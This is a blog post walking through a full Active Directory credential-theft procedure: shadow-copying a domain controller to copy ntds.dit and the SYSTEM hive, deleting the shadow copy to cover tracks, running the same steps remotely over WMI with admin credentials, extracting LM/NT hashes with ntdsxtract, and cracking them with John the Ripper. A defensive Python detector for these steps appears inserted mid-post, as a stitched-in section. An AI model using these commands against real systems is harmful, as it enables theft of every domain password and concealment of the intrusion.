Thursday, October 20, 2016

dumping ad passwords and cracking with jtr

yes, some people use the euphemism "windows domain controller password audit." but, let's call it what it is: dumping ad and getting password hashes. i'm using jtr.
  
 ........................................  
 on a domain controller, using a privileged account:  
   
 C:\ vssadmin list shadows  
   
 none. okay.  
   
 * where's ntds.dit? take note of the path.  
   
 C:\Windows\NTDS\ntds.dit  
   
 * make a system dir  
   
 C:\ mkdir C:\Windows\system  
   
 * make a shadow copy of C:\  
   
 * C:\ vssadmin create shadow /for=C:  
   
 you should see:  
   
 vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool  
 (C) Copyright 2001-2005 Microsoft Corp.  
   
 Successfully created shadow copy for 'C:\'  
   Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}  
   Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1  
   
 * C:\Users\administrator>vssadmin list shadows  
   
 vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool  
 (C) Copyright 2001-2005 Microsoft Corp.  
   
 Contents of shadow copy set ID: {c83ef910-aa7a-45cb-a434-b87936c864d0}  
   Contained 1 shadow copies at creation time: 10/20/2016 9:16:45 AM  
    Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}  
      Original Volume: (C:)\\?\Volume{b5d3ef64-5116-11e5-a5af-806e6f6e6963}\  
      Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1  
      Originating Machine: domain-dc1.domain  
      Service Machine: domain-dc1.domain  
      Provider: 'Microsoft Software Shadow Copy provider 1.0'  
      Type: ClientAccessible  
      Attributes: Persistent, Client-accessible, No auto release, No writers, Differential  
   
 * next, copy ntds.dit from the shadow copy someplace it can be retrieved on the non-shadowed drive.  
 that would be from the shadow volume NTDS location to, say, C:\  
   
 C:\Users\administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\  
     1 file(s) copied.  
       
 * copy SYSTEM hive  
   
 C:\Users\administrator.DEVTEST>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\  
     1 file(s) copied.  
 
 * let's cover our tracks and prevent others from grabbing dit and SYSTEM  
   
 C:\ vssadmin delete shadows /for=C: /shadow=ee0afc8a-5001-48d7-b634-8d66b6450250  

 ........................................  
 a linux interlude... if you have admin creds and do not have access to a console and do not want to have access to a console  
 
 # mount -t cifs //192.168.5.13/C$ -o username=domain/administrator,password=weakpassword /root/mnt 
 # apt-get install wmis  
 # wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c vssadmin list shadows > c:\output.txt"  
 # cat /root/mnt/output.txt
 
 look for the Shadow Copy Volume name (HarddiskVolumeShadowCopyN); that is where you'll find ntds.dit and SYSTEM  

 # wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit c:\ > c:\output.txt"  
   
 # wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\ > c:\output.txt"  

 # ls /root/mnt  
 ntds.dit SYSTEM 
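 From the defender's seat, here is an added example (not code from the post): a small detector that classifies constructed process-creation records and flags the steps above, the shadow copy creation and deletion and the copies of ntds.dit and SYSTEM out of a HarddiskVolumeShadowCopy path, and marks the WMI-spawned variant from the linux interlude by its WmiPrvSE.exe parent. The record field names are assumptions modelled on Sysmon Event ID 1 / Security 4688 with command-line auditing enabled.

```python
import re

# Constructed process-creation records (field names are assumptions modelled on
# Sysmon Event ID 1 / Security 4688 with command-line auditing enabled); they
# mirror the commands run in the post, not real captured logs.
SAMPLE_EVENTS = [
    {"host": "domain-dc1", "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmd": "vssadmin list shadows"},
    {"host": "domain-dc1", "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmd": "vssadmin create shadow /for=C:"},
    {"host": "domain-dc1", "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmd": "copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1"
            "\\Windows\\NTDS\\ntds.dit C:\\"},
    {"host": "domain-dc1", "parent": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "cmd": "cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1"
            "\\Windows\\System32\\config\\SYSTEM c:\\ > c:\\output.txt"},
    {"host": "domain-dc1", "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmd": "vssadmin delete shadows /for=C: "
            "/shadow=ee0afc8a-5001-48d7-b634-8d66b6450250"},
    {"host": "ws01", "parent": "C:\\Windows\\explorer.exe",
     "cmd": "notepad.exe C:\\notes.txt"},
]

# One rule per step of the technique. 'vssadmin list shadows' on its own is
# deliberately not flagged: it is routine administration and would drown the signal.
RULES = [
    ("vss_create", re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow", re.I)),
    ("vss_delete", re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("shadow_ntds",
     re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\NTDS\\ntds\.dit", re.I)),
    ("shadow_system_hive",
     re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\config\\SYSTEM\b", re.I)),
]

def classify(event):
    """Rule names the event trips, plus 'via_wmi' when the command was
    spawned by the WMI provider host (the remote wmis variant)."""
    tags = [name for name, rx in RULES if rx.search(event["cmd"])]
    if tags and event["parent"].lower().endswith("\\wmiprvse.exe"):
        tags.append("via_wmi")
    return tags

def detect(events):
    """Return (host, tags, command) for every event that trips a rule."""
    hits = []
    for ev in events:
        tags = classify(ev)
        if tags:
            hits.append((ev["host"], tags, ev["cmd"]))
    return hits

if __name__ == "__main__":
    for host, tags, cmd in detect(SAMPLE_EVENTS):
        print(f"{host}: {','.join(tags)} :: {cmd}")
```

 On a real domain controller the sequence create shadow, copy from the shadow path, delete shadows within minutes of each other is the pattern worth alerting on, and command-line auditing has to be switched on for the 4688 field to be populated at all.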
      
 ........................................  
 linux ubuntu/debian rig
  
 install base packages:
  
 # apt-get install cifs-utils autoconf automake autopoint libtool pkg-config  
   
 offline processing tools:  
   
 libesedb  
   
 # git clone https://github.com/libyal/libesedb.git  
 # cd libesedb/  
 # ./synclibs.sh  
 # ./autogen.sh  
 # ./configure  
 # make && make install  
 # ldconfig   <- refresh the shared library cache so esedbtools can find libesedb  
   
 creddump  
   
 # git clone https://github.com/moyix/creddump.git  
   
 ntdsxtract  
   
 # git clone https://github.com/csababarta/ntdsxtract.git  
   
 get cracking!  
   
 # mount -t cifs //192.168.5.13/C$ -o username=domain/administrator,password=weakpassword /root/mnt  
 # mkdir ~/domain  
 # cp /root/mnt/SYSTEM /root/mnt/ntds.dit ~/domain/  
 # cd ~/libesedb/esedbtools  
 # ./esedbexport -t ~/domain ~/domain/ntds.dit  
 esedbexport 20160924  
   
 Opening file.  
 Exporting table 1 (MSysObjects) out of 12.  
 Exporting table 2 (MSysObjectsShadow) out of 12.  
 Exporting table 3 (MSysUnicodeFixupVer2) out of 12.  
 Exporting table 4 (datatable) out of 12.  
 Exporting table 5 (hiddentable) out of 12.  
 Exporting table 6 (link_table) out of 12.  
 Exporting table 7 (sdpropcounttable) out of 12.  
 Exporting table 8 (sdproptable) out of 12.  
 Exporting table 9 (sd_table) out of 12.  
 Exporting table 10 (MSysDefrag2) out of 12.  
 Exporting table 11 (quota_table) out of 12.  
 Exporting table 12 (quota_rebuild_progress_table) out of 12.  
 Export completed.  
   
 # ls ~/domain.export  
   
 datatable.3      <- accounts
 hiddentable.4  
 link_table.5     <- db links
 MSysDefrag2.9  
 MSysObjects.0  
 MSysObjectsShadow.1  
 MSysUnicodeFixupVer2.2  
 quota_rebuild_progress_table.11  
 quota_table.10  
 sdpropcounttable.6  
 sdproptable.7  
 sd_table.8  
   
 # python ntdsxtract/dsusers.py ~/domain.export/datatable.3 ~/domain.export/link_table.5 ~/temp --passwordhistory --passwordhashes --lmoutfile ~/domain/lmhash.out --ntoutfile ~/domain/nthash.out --pwdformat john --syshive ~/domain/SYSTEM  

 what does that mean?  
   dsusers.py                       <- the command  
   ~/domain.export/datatable.3      <- account table  
   ~/domain.export/link_table.5     <- links table  
   ~/temp                           <- where work is done  
   --passwordhistory                <- we want them all  
   --passwordhashes                 <- we want hashes  
   --lmoutfile ~/domain/lmhash.out  <- where to send lm hash  
   --ntoutfile ~/domain/nthash.out  <- where to send nt hash  
   --pwdformat john                 <- hash format  
   --syshive ~/domain/SYSTEM        <- system hive  
   
 [+] Started at: Thu, 20 Oct 2016 17:47:21 UTC  
 [+] Started with options:  
     [-] Extracting password hashes  
     [-] LM hash output filename: /root/domain/lmhash.out  
     [-] NT hash output filename: /root/domain/nthash.out  
     [-] Hash output format: john  
 The directory (/root/temp) specified does not exists!  
 Would you like to create it? [Y/N]  
   
 # ls ~/domain/  
   
 lmhash.out  
 nthash.out  
   
 * feed into jtr and use cracked passes to compose a wordlist suitable for nt format  
   
 # ./john --session=lm --format=lm --fork=2 --incremental=LM_ASCII lmhash.out  
 note: lm is not compatible with gpu cracking  
   
 # ./john --show lmhash.out  
   
 # ./john --show --format=lm lmhash.out | grep -v "password hashes" | cut -d":" -f2 | sort -u >lmcrack.txt  
   
 # ./john --session=nt --format=nt --fork=2 --wordlist=lmcrack.txt --rules=NT nthash.out  
   